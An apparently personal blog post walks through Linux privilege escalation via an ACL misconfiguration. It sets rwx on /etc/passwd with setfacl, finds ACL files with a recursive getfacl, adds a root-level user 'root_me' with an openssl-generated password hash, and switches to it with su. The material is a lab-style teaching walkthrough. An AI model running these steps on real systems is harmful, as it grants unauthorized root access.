I am writing this blog because I didn’t find much resources on ACL privilege escalation
ACL is special permission given to specific user on XFS file system
First I will show you how we can configure ACL and make our system vulnerable then we will exploit to get superuser
Configuration
I am setting this permission on /etc/passwd
syntax
# setfacl -m “u:username:permissions” file.txtso the permission which I am setting for passwd are
# setfacl -m "u:tanishq:rwx" /etc/passwdnow our work is done if you want to remove the permission you can use the command I am giving down below
# setfacl -b /etc/passwdLETS EXPLOIT
for exploiting I am using a normal user with no special sudo powers
for finding out ACL power files use the command
$ rm /tmp/getfacl.txt; getfacl -R -s -p / 2>/dev/null > /tmp/getfacl.txt; cat /tmp/getfacl.txt | grep -v "getfacl:"it will result files with ACL permission now try to find which can help us in some way to escalate
here at the end see our current user have permission to write in passwd
now we will try to create a new user and give it our custom password
$ vim /etc/passwd
here I have created a new user with the name of root_me
$ vim /etc/passwdand for password I used openssl command
MAIN HOST# openssl passwd 123now save the file
and switch the user
$ su - root_me
here we got root with ACL misconfiguration
If you are still confuse or have a better way dm me on twitter root_tanishq
Bye :D
